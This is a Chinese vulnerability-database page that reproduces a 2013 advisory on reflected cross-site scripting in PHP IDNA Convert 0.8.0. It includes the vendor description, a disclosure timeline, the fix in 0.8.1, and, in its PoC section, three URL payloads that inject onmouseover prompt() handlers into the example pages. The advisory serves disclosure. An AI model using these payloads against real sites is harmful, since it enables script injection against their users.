PHP IDNA Convert Cross-site scripting

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1044361 漏洞类型
发布时间 2013-10-03 更新时间 2013-10-03
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2013100018
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
[ PHP IDNA Convert Cross-site scripting ( XSS ) ]
 
[ Vendor product description]
 
PHP Net_IDNA is a class to convert between the Punycode and Unicode
formats. Punycode is a standard described in RFC 3492 and part of IDNA
(Internationalizing Domain Names in Applications [RFC3490]) . This class
allows PHP scripts to convert these domain names without having one of
the PHP extensions installed. It supports both IDNA 2003 and IDNA 2008.
 
[ Bug Description ]
 
Cross-site scripting (XSS) vulnerability in parameters encoded/decoded
in the class PHP IDNA Convert allows remote attackers to inject
arbitrary web script or HTML.
 
[ History ]
 
Advisory sent to vendor on 09/24/2013
Vendor reply on 09/25/2013
Vulnerability fixed on 09/26/2013
 
[ Impact ]
 
HIGH
 
[ Afected Version ]
 
0.8.0
 
[ Vendor Reply ]
 
Yes. Version 0.8.1 released
 
[ CVE Reference ]
 
 
 
[ PoC ]
 
Payloads:
 
http://[host]/idna_convert/index.php?decoded=94102%22%20onmouseover%3dprompt(929882)%20bad%3d%22&encode=Encode%20>>&idn_version=2003
 
http://[host]/idna_convert/example.php?decode=<<%20Decode&encoded=94102%22%20onmouseover%3dprompt(938200)%20bad%3d%22
 
http://[host]/index.php/%22onmouseover%3d%27prompt%28976724%29%27bad%3d%22%3E
 
[ References ]
 
[1] PHP IDNA Convert - http://phlymail.com/en/downloads/idna-convert.html
 
[2] Owasp Cross-site scripting -
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
 
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/
 
--------------------------------------------
iBliss Segurana e Intelig&#234;ncia - Sponsor: Alexandro Silva - Alexos
 
alexos (at) ibliss.com (dot) br [email concealed]